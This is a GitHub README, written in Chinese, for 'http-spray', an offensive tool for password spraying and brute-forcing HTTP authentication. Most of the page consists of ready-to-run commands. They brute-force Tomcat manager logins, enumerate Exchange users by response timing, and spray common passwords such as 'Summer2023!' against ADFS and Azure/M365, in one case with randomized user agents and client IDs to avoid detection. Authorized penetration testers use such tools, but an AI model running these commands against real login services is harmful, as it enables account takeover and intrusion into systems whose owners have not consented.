dadevel/http-spray
GitHub: dadevel/http-spray
一款针对 HTTP(S) 身份认证服务的密码喷洒与暴力破解工具,支持对 Tomcat、Exchange、ADFS、Azure/M365 等目标进行凭据测试与用户枚举。
Stars: 6 | Forks: 0
# http-spray
## 安装说明
使用 [uv](https://github.com/astral-sh/uv/) 或 [pipx](https://github.com/pypa/pipx/) 安装。
```
uv tool install git+https://github.com/dadevel/http-spray.git
pipx install git+https://github.com/dadevel/http-spray.git
```
## 用法
基本示例:暴力破解 Tomcat manager 登录。
```
curl -LO https://github.com/dadevel/wordlists/raw/main/passwords/tomcat-credentials.txt
http-spray -t https://app.corp.com/tomcat/manager/html -m basic -c ./tomcat-credentials.txt | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'
```
### Exchange
针对本地 Exchange 服务器的基于时间的用户枚举。
对有效用户的请求大约需要 0.1 秒,无效用户需要超过 1.5 秒。
```
http-spray -t https://mail.corp.com/rpc/ -m basic -u ./users.txt -p '' | tee -a ./http-spray.json | jq -c 'select(.time < 0.5)'
```
针对本地 Exchange 服务器的密码喷洒。
```
http-spray -t https://mail.corp.com/rpc/ -m ntlm ./users.txt -p 'Summer2023#' | tee -a ./http-spray.json | jq -c 'select(.status_code != 401)'
```
### ADFS
通过 NTLM 身份验证针对 ADFS 进行密码喷洒。
```
http-spray -t https://sts.corp.com/adfs/services/trust/2005/windowstransport -m ntlm -u ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json
```
通过 OAuth2 密码授权针对 ADFS 进行密码喷洒。
```
http-spray -t https://sts.corp.com/adfs/oauth2/token -m oauth --client-id 11111111-2222-3333-4444-555555555555 --resource https://app.corp.com/ -u ./users.txt -p 'Summer2023!' -p 'Winter2023!' | tee -a ./http-spray.json | jq -c 'select(.status_code == 200)'
```
### Microsoft Cloud
通过 OAuth2 密码授权针对 Azure/M365 进行密码喷洒。
```
http-spray -t https://login.windows.net/corp.com/oauth2/token -m msauth --client-id 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --resource https://graph.windows.net -u ./users.txt -p 'Summer@2024' | tee -a ./http-spray.json
```
通过完全随机化请求针对 Azure/M365 进行密码喷洒。
```
http-spray -t https://login.microsoftonline.com/corp.com/oauth2/token -m msauth --user-agent ./wordlists/desktop-user-agents.csv --client-id ./wordlists/m365-public-clients.csv --resource ./wordlists/m365-resources.csv -u ./users.txt -p ./passwords.txt | tee -a ./http-spray.json
```
### 推送通知
集成 [pushover.net](https://pushover.net/)。
```
tail -f ./http-spray.json | jq -c 'select(.status!="invalid" and .status!="exists")|del(.user, .password)' | xargs -r -I'{}' -- curl -sSf https://api.pushover.net/1/messages.json -d "user=$PUSHOVER_USER" -d "token=$PUSHOVER_TOKEN" --data-urlencode title='Password Spraying' --data-urlencode 'message={}'
```
标签:Blue Team, HTTP协议, PoC, 动态分析, 密码喷射, 暴力破解, 用户模式钩子绕过, 逆向工具